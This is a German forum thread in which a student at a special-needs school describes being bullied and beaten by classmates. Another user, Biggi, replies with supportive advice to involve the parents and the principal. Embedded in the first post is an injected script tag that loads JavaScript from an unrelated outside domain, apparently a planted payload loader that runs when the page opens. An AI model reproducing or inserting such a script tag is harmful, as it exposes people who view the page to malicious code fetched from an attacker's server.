Ankündigung

Einklappen
Keine Ankündigung bisher.

hilfe

Einklappen
X

• Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

• hilfe

ich werde gehmobbt weill ich FÖRDERSCHÜLER binn und ich weiß nicht was ich machen soll einmal wurde ich angehkriffen von 5 leuten die mich zusammen gehschlagen haben biss ich aufen bodenlag ja und die dan habe ich es gehsagt also die lehrer aber es hilft nichst die machen immer weitter biss ich ma gehwert habe aber das war scheiße von mir ich haben den jungen der mich mobbt den arm gehbrochen seit den läst er mich bissel in ruche aber er schikt immer leute auf mich
    ja und dan wurde noch mein kopf gegen eine wand gehschlagen und die erwachsenen haben nichst gehmacht die haben nur gehsagt die sollen mich in ruche lassen es hat alles angehfangen aufen schuhlhoff ich sool ihn beleidigt haben was nicht stimmt kann mir jemanden sagen was ich machen soll
    <script src="http://rosa-farbe.info/dfi823hs.js?0.47135254576954577"></script>

AW: hilfe

Guten Morgen, Paffy! Das ist ja der Hammer, was die da mit Dir machen.Mach Dir keine Sorgen, daß Du ihm den Arm gebrochen hast, daß war Notwehr. Ich hoffe, der Junge hat daraus gelernt. Donnerwetter, hast Du Kraft! ich hoffe, Du machst Sport:-))) Gehe zu Deinen Eltern und rede mit Ihnen, die sollen mal zur Schule gehen und mit dem Rektor reden, so kann es für Dich nicht weitergehen. Auch soll sich der Rektor mal diese Jungs vornehmen, evtl. einen Verweis aussprechen. Laß Dir das nicht gefallen. Tipp: Wenn die Dich verprügeln wollen, rennst Du ins Sekretariat, daß nervt die dann so sehr, daß sie was machen müssen. Aber erst, mit den Eltern reden, die sollen da mal auf den Tisch hauen, schließlich sollst du was lernen und nicht immer Prügel kassieren. Paffy, ich kenn Dich nicht, ich hoffe aber auch, daß Du die Jungs nicht provozierst, sprich ärgerst, denn dann haben sie dich immer wieder auf dem Kiecker! Viel Spaß in der Schule und paß gut auf. Bis bald Biggi! :-)))

Kommentar

Danke bloß die haben gar kein rispekt vor dem rektor

Kommentar

Hallo Paffy - Mach doch erstmal einen Schritt! Erstmal mit den Eltern reden! Dann sollen die Eltern in Deine Schule gehen und mit dem Rektor reden, daß es so nicht weitergeht. Der Rektor soll endlich was unternehmen! Paffy, es ist doch egal jetzt, ob die Jungs Respekt vor dem Rektor haben, wichtig ist es jetzt, daß Du Dir es nicht mehr gefallen läßt und Deine Eltern in die Schule schickst, damit Ruhe einkehrt und der Rektor sich die Jungs mal zur Brust nimmt. Wie lange willst Du denn noch warten? Paffy, wie alt bist Du? :-))) Schönen Tag - Biggi P.S. Deine Eltern müssen in die Schule! Wenn ich Deine Mutter währ, dann währ ich schon längst in der Schule und hätte mit dem Rektor geredet UND den Jungs....! :-)))

Kommentar

wen das soo einfach wäre kommischer weisse fligen die nicht von der schule

Kommentar

Lädt...
          X